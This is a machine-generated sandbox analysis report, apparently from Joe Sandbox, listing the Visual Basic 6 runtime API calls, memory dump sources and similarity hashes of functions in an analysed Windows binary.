                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
                                                                                                                                                                                    • Part of subcall function 00410180: #525.MSVBVM60(00000104), ref: 0041029C
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60 ref: 004102A7
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000,00000000), ref: 004091D2
                                                                                                                                                                                  • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 00409245
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040925D
                                                                                                                                                                                  • #600.MSVBVM60(00000008,00000000), ref: 00409273
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00409282
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60 ref: 004092A4
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004092B9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004092CD
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004092DA
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004092EA
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040930E
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405A00,0000005C), ref: 00409354
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Free$Copy$List$Error$System$Ansi$#516#631$Bstr$#525#537#580#600#616BoundsChangeCheckChkstkCloseConstruct2DestructFindGenerateHresultNotificationUnicode
                                                                                                                                                                                  • String ID: PR$ RO$ SE$Once$~
                                                                                                                                                                                  • API String ID: 3290240664-1255219571
                                                                                                                                                                                  • Opcode ID: d5fff701b2953cd860e5e11b1a5544c82864759be8fb13f2454ba8dac6c0f824
                                                                                                                                                                                  • Instruction ID: 7d3b41f73b1118d4cefcb71df8c3f05656ff7fe774afdbe4e31ac6fe335ab197
                                                                                                                                                                                  • Opcode Fuzzy Hash: d5fff701b2953cd860e5e11b1a5544c82864759be8fb13f2454ba8dac6c0f824
                                                                                                                                                                                  • Instruction Fuzzy Hash: A213EC75910208EFDB14EFE0EE58ADE7B79FF48301F108169F606A72A0DB745A49CB58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  [Figure: control-flow graph for the function beginning at 407a50; legend: Executed / Not Executed]
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?,004025E6), ref: 00407A6E
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004055D8,0041B8D8,?,?,?,?,004025E6), ref: 00407AC6
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00407B2C
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000068), ref: 00407B8C
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 00407BB5
                                                                                                                                                                                  • __vbaEnd.MSVBVM60 ref: 00407BCD
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 00407BED
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00407C53
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,0000007C), ref: 00407CAE
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 00407CC9
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004053E4,000001BC), ref: 00407D0D
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 00407D3F
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004055C8,00000014), ref: 00407DA5
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000050), ref: 00407E02
                                                                                                                                                                                  • #618.MSVBVM60(?,00000001), ref: 00407E20
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00407E2B
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(004055FC,00000000), ref: 00407E37
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00407E55
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60(?,?,004025E6), ref: 00407E61
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004055D8,0041B8D8,?,?,004025E6), ref: 00407E90
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00407EF6
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000050), ref: 00407F53
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00407F84
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 00407F8D
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004055D8,0041B8D8,?,?,004025E6), ref: 00407FB2
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00408018
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000050), ref: 00408075
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(004055FC,?), ref: 00408096
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004080A1
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 004080AA
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 004080B3
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004080C8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004080DC
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004080E9
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004080F9
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004055D8,0041B8D8,?,?,?,?,?,004025E6), ref: 0040811C
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00408182
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000058), ref: 004081DF
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(?,?), ref: 004081FF
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040820A
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 00408216
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408221
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040822F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040823A
                                                                                                                                                                                  • #517.MSVBVM60(00000000), ref: 00408241
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040824C
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408259
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00408275
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00408281
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00408296
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082AA
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082B7
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082C7
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082DF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                    • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082F3
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00408300
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408310
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408328
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408343
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 0040834A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408355
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408362
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00408376
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040838E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004083A8
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004083AF
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004083BA
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004083C7
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004083DB
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004083F3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408407
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408414
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408424
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040843C
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408457
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 0040845E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408469
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408476
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040848A
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004084A2
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004084BD
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004084C4
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004084CF
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004084DC
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004084F0
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408508
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 0040851C
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408529
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408539
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408556
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408561
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 0040856D
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408578
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408586
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408591
                                                                                                                                                                                  • #517.MSVBVM60(00000000), ref: 00408598
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004085A3
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004085B0
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 004085C8
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004085E0
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004085F4
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408601
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408611
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040862F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040863A
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 00408646
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408651
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040865E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408669
                                                                                                                                                                                  • #517.MSVBVM60(00000000), ref: 00408670
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040867B
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408688
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 004086A0
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004086B8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004086D3
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004086DA
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004086E5
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004086F2
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00408706
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040871E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408739
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 00408740
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040874B
                                                                                                                                                                                  • #517.MSVBVM60(00000000), ref: 00408752
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040875D
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040876A
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 00408782
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040879A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004087AE
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004087BB
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004087CB
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004087E7,00000000), ref: 004125BE
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004125EB
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004125FA
                                                                                                                                                                                    • Part of subcall function 004125A0: #648.MSVBVM60(0000000A), ref: 00412619
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaFreeVar.MSVBVM60 ref: 00412628
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaI2I4.MSVBVM60(?), ref: 0041263C
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041264A
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaI2I4.MSVBVM60 ref: 0041265A
                                                                                                                                                                                    • Part of subcall function 004125A0: #570.MSVBVM60(00000000), ref: 00412661
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaLenBstr.MSVBVM60(00404B24), ref: 0041266E
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaLenBstr.MSVBVM60(00404B24), ref: 004126A5
                                                                                                                                                                                    • Part of subcall function 004125A0: #525.MSVBVM60(00000000), ref: 004126AC
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaStrMove.MSVBVM60 ref: 004126B7
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaI2I4.MSVBVM60 ref: 004126C7
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004126D2
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaI2I4.MSVBVM60 ref: 004126E2
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004126EF
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaStrMove.MSVBVM60(?), ref: 0041270A
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaStrCopy.MSVBVM60 ref: 00412728
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaStrMove.MSVBVM60(00000003), ref: 00412739
                                                                                                                                                                                    • Part of subcall function 004125A0: #616.MSVBVM60(00000000), ref: 00412740
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,00000000), ref: 004087F5
                                                                                                                                                                                  • #669.MSVBVM60 ref: 00408802
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040880D
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040881A
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00408823
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040883C
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00405B3C,?), ref: 00408855
                                                                                                                                                                                  • __vbaEnd.MSVBVM60(80000002,00000000,00000000,00000000,80000002,00000000,00000000,00000000), ref: 004088B0
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00405E88,?), ref: 004088CE
                                                                                                                                                                                  • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B078,00000000), ref: 00408931
                                                                                                                                                                                  • #600.MSVBVM60(00004008,00000000,00000000), ref: 0040895B
                                                                                                                                                                                  • __vbaEnd.MSVBVM60 ref: 0040896E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408A41
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408A5B
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 00408A62
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408A6D
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408A7A
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00408A8E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408AA6
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408AC1
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 00408AC8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408AD3
                                                                                                                                                                                  • #517.MSVBVM60(00000000), ref: 00408ADA
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408AE5
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408AF2
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 00408B0A
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408B22
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408B36
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408B43
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408B53
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408B6B
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408B7F
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408B8C
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408B9C
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408BB4
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408BC8
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408BD5
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408BE5
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408BFD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408C11
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408C1E
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408C2E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408C46
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Copy$Free$List$CheckHresult$ErrorNew2$#517$Bstr$#516#631AnsiChkstkSystemUnicode$File$#525#537#570#580#600#616#618#648#669Get3OpenSeek
                                                                                                                                                                                  • String ID: ;$MGH+$2
                                                                                                                                                                                  • API String ID: 2419524798-2363849171
                                                                                                                                                                                  • Opcode ID: 4922fd86914f0d1911d26fd6260cb31160d45723a23d8febec2101ce13e3e991
                                                                                                                                                                                  • Instruction ID: 93bf0c189370be62b4749cd89f90093835801c62d3816994bc11815577fef7f0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4922fd86914f0d1911d26fd6260cb31160d45723a23d8febec2101ce13e3e991
                                                                                                                                                                                  • Instruction Fuzzy Hash: 59B2FB71900218EFDB14DFA0DD48BEEBBB5FB48305F10816AE206B72A4DB745A85CF59
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Control-flow Graph

